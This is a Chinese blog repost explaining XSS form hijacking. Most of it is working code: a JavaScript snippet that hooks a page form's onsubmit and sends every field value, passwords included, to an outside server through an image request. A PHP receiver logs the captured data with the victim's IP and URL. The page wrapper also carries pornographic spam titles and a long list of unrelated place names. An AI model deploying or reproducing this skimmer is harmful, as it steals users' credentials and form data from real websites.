91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

xss 表單劫持(from通用明文記錄)

發布時間:2020-07-24 12:39:25 來源:網絡 閱讀:3658 作者:jzking121 欄目:網絡安全

大家都知道,在提交form表單時會調用onsubmit方法,既然調用了onsubmit,說明表單中該填的項肯定都已經填好了,這時,我們通過修改onsubmit方法,便可以獲取表單中的信息.


xss.js:

var f=document.forms['from1'];
if(f==undefined)
{
        f=document.getElementById('');
}
var func=f.onsubmit;
f.onsubmit=function(event)
{
	var str='';
	for(var i=0;i<f.elements.length;i++)
	{
		str+=f.elements[i].name+':'+f.elements[i].value+'||';
	}
	str=str.substr(0,str.length-2);
	var img=new Image();
	img.src='https://blog.51cto.com/xss.php?data='+escape(str)+'&url='+escape(location.href);
	func(event);
	return true;
}

xss 表單劫持(from通用明文記錄)


根據各程序不同,修改表單名稱

var f=document.forms['form1'];



接收端xss.php

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['data'];
$url = $_GET['url'];
$time = gmdate("H:i:s",time()+8*3600);
$file = "jzking121.txt" ;
$fp=fopen ("jzking121.txt","a")  ;
$txt= "$ip"."----"."$time"."----"."$cookie"."----"."$url"."\n";
fputs($fp,$txt);
?>



參考:

http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

淳化县| 武威市| 临邑县| 北碚区| 双鸭山市| 含山县| 黑龙江省| 卓尼县| 滕州市| 乌兰浩特市| 邻水| 抚宁县| 高台县| 石台县| 思南县| 甘南县| 齐河县| 自贡市| 楚雄市| 聂荣县| 嘉黎县| 肥乡县| 吉木乃县| 大宁县| 汤原县| 宁晋县| 呼和浩特市| 正阳县| 盘锦市| 伊金霍洛旗| 行唐县| 景东| 思茅市| 宜黄县| 遵化市| 西昌市| 吉首市| 苏尼特左旗| 嵩明县| 虹口区| 荥阳市|